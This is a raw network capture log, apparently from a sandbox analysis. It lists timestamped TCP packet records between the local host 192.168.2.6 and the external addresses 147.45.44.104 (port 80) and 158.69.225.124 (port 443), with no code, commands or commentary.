Sep 4, 2024 17:37:09.013865948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.013875961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.013906956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.013915062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014020920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014031887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014040947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014050007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014060020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014061928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014086008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014096975 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014480114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014492035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014501095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014511108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014528036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014528036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014554024 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014568090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014579058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014586926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014591932 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.014597893 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.014602900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014611006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014614105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014624119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014632940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014642954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014647007 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.014650106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014656067 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.014661074 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.014663935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014671087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014682055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014683962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014692068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014695883 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.014699936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014709949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014714956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014719963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014730930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014739037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014743090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014748096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014758110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014767885 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014770031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014792919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014800072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014889956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014900923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014909983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014919996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014924049 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014930010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014933109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014940977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014955044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.014959097 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.014977932 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.015003920 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.015121937 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.015135050 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.015167952 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.015173912 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.015188932 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.015202999 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.015361071 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.015376091 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.015420914 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.015428066 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.015459061 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.016721964 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.016735077 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.016777992 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.016784906 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.016796112 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.016819954 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.019459963 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.019476891 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.019522905 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.019529104 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.019567966 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.023017883 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.023039103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.023049116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.023070097 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.023097038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.023112059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.023144960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.023150921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.023159027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.023179054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.023186922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.023190975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.023202896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.023226023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.023250103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.047307968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047319889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047328949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047378063 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.047401905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.047406912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047419071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047427893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047442913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.047456026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.047463894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047491074 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.047491074 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.047719002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047761917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.047810078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047821045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047847986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.047861099 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.047939062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047960043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047974110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047976017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.047987938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.047998905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.048010111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.048017025 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.048847914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.048888922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.048907042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.048918009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.048949003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.048990965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049000978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049009085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049016953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049025059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.049026966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049043894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.049065113 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.049124956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049135923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049170971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.049242973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049253941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049263000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049272060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049280882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.049288988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.049308062 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.067825079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.067847967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.067857981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.067879915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.067895889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.067909002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.067919016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.067944050 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068022013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068033934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068043947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068063021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068083048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068375111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068433046 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068435907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068449974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068476915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068494081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068527937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068540096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068550110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068559885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068559885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068578005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068592072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068655968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068691969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068711042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068721056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068747044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068766117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068773985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068785906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068794966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068806887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.068813086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068824053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.068846941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.069580078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.069591045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.069602013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.069624901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.069648027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.069670916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.069686890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.069696903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.069708109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.069711924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.069720030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.069739103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.069758892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.069789886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.069828987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.069869995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.069885015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.069911957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.069925070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070002079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070014000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070044994 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070056915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070089102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070135117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070220947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070233107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070262909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070300102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070311069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070327997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070333958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070338011 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070349932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070358038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070364952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070380926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070384979 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070398092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070401907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070410967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070430040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070445061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070504904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070517063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070533037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070543051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070553064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070580959 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070632935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070643902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070655107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070664883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070666075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070678949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070691109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070715904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070885897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070895910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070905924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070915937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070926905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070931911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070938110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070945024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070949078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070960999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070967913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.070975065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.070998907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071018934 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071191072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071201086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071212053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071222067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071228981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071233034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071244001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071244955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071258068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071269035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071274996 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071294069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071294069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071306944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071311951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071329117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071332932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071341038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071347952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071356058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071362019 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071366072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071372986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071378946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071389914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071392059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071402073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071404934 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071419001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071444988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071655035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071669102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.071696043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.071712017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.104120970 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.104135036 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.104185104 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.104193926 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.104204893 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.104238987 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.104852915 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.104867935 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.104923010 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.104931116 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.104968071 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.105365992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105376005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105385065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105410099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.105429888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.105500937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105520964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105530024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105539083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105544090 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.105557919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.105580091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.105684042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105695009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105703115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105712891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105721951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105726004 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.105734110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105742931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.105745077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.105766058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.105772972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.106221914 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.106235981 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.106281996 CEST	49727	443	192.168.2.6	158.69.225.124
